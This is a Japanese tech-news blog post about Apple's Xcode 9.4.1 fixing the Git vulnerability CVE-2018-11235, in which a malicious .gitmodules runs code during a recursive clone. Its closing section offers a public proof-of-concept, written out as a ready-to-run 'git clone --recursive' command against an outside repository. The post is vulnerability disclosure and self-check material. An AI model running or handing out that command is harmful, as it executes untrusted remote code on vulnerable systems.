Apple、「Xcode v9.4.1」で悪意のあるリポジトリを操作すると任意のコードが実行される可能性があるGitの脆弱性を修正。

スポンサーリンク

 Appleが「Xcode v9.4.1」で悪意のあるリポジトリを操作すると任意のコードが実行される可能性があるGitの脆弱性を修正しています。詳細は以下から。


 Appleは現地時間2018年06月13日、macOS 10.13.2以上のmacOSに対しIDE「Xcode v9.4.1」をリリースし、05月29日にEtienne Stalmansによって発見されたGitの脆弱性CVE-2018-11235を修正したと発表しています。

Git

  • Available for: macOS High Sierra 10.13.2 or later
  • Impact: Multiple issues in git, the most significant of which may lead to arbitrary code execution
  • Description: Multiple issues existed in git. These issues were addressed by updating git to version 2.15.2.
  • CVE-2018-11235: Etienne Stalmans
    CVE-2018-11233

About the security content of Xcode 9.4.1 – Apple Support

 この脆弱性は悪意のあるユーザーによって作成された.gitmoduleのあるリポジトリを”git clone –recurse-submodules”すると、任意のコードが実行されるというもので、既にMicrosoftやGitはこの脆弱性を修正していましたが、Appleも今回のXcode v9.4.1アップデートでGitをv2.15.2へアップデートし脆弱性を修正したそうです。

Git v2.15.2 Apple Git-101.1

スポンサーリンク

おまけ

 前回と同様に、この脆弱性を利用した例のコードをぐれさん(@grethlen)が公開しているので、脆弱性チェックに利用したい方は試してみてください。

CVE-2018-11235

/usr/bin/git clone --recursive http://greymd@bitbucket.org/greymd/cve-2018-11235.git